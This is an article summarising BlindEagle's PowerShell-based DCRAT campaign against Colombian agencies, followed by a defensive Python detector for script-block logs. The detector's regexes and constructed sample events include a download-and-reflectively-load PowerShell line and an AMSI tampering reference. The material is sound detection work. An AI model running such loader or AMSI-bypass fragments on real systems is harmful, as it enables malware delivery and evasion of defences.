BlindEagle Hackers Attacking Government Agencies with Powershell Scripts
BlindEagle, a South American threat group, has launched a sophisticated campaign against Colombian government agencies, demonstrating an alarming evolution in attack techniques. The campaign begins with a phishing email that, remarkably, was sent from a compromised account within the targeted organization, lending the message credibility and bypassing conventional email security measures. The attack chain culminates in a PowerShell command that downloads an image file from the Internet Archive, extracts a Base64-encoded malicious payload hidden within it, and loads that payload directly into memory using .NET reflection. The delivered payload, DCRAT, includes advanced evasion capabilities, notably patching Microsoft's Antimalware Scan Interface (AMSI) to disable detection mechanisms.
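As an added, defender-side example (not code from the article or from the research it summarizes), the following Python scores PowerShell script block log entries (Event ID 4104) for the chain described above: an image download, especially from archive.org, combined with Base64 decoding and reflective assembly loading, or any reference to AMSI internals. The sample events are constructed, and the indicator names, regexes and severity thresholds are my own assumptions, not published detection content.

```python
import re

# Each indicator is a regex run over the whole script block text; re.S lets a
# download verb and an image extension sit on different lines of one block.
INDICATORS = {
    "image_download": re.compile(
        r"(?:DownloadData|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b.*?"
        r"\.(?:png|jpe?g|gif|bmp)\b", re.I | re.S),
    "archive_org_host": re.compile(r"https?://(?:[\w-]+\.)*archive\.org/", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\b", re.I),
    "amsi_tamper": re.compile(r"AmsiScanBuffer|amsiInitFailed|AmsiUtils", re.I),
}
# The three indicators that together reproduce the loader chain from the article.
LOADER_CHAIN = {"image_download", "base64_decode", "reflective_load"}

def analyze_script_block(text):
    # Returns (verdict, sorted indicator names) for one script block.
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if "amsi_tamper" in hits or LOADER_CHAIN <= hits:
        verdict = "high"      # AMSI tampering or the full image-to-memory chain
    elif len(hits) >= 2:
        verdict = "medium"    # partial chain, worth an analyst's look
    elif hits:
        verdict = "low"       # single indicator, common in benign admin scripts
    else:
        verdict = "none"
    return verdict, sorted(hits)

def scan_events(events):
    # events: dicts with "id" (Windows event ID), "record" and "text" keys.
    alerts = []
    for ev in events:
        if ev["id"] != 4104:  # only script block logging events carry code
            continue
        verdict, hits = analyze_script_block(ev["text"])
        if verdict != "none":
            alerts.append({"record": ev["record"], "verdict": verdict, "hits": hits})
    return alerts

# Constructed sample telemetry (assumed shape; not real logs from the campaign).
SAMPLE_EVENTS = [
    {"id": 4104, "record": 101,
     "text": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'A*' }"},
    {"id": 4104, "record": 102,
     "text": "$d=(New-Object Net.WebClient).DownloadData("
             "'https://archive.org/download/PLACEHOLDER/pic.jpg');\n"
             "[Reflection.Assembly]::Load([Convert]::FromBase64String($s))"},
    {"id": 4104, "record": 103,
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"},
]
```

Run `scan_events(SAMPLE_EVENTS)` to see record 102 flagged for the full loader chain and record 103 for AMSI tampering, while the benign directory listing produces no alert.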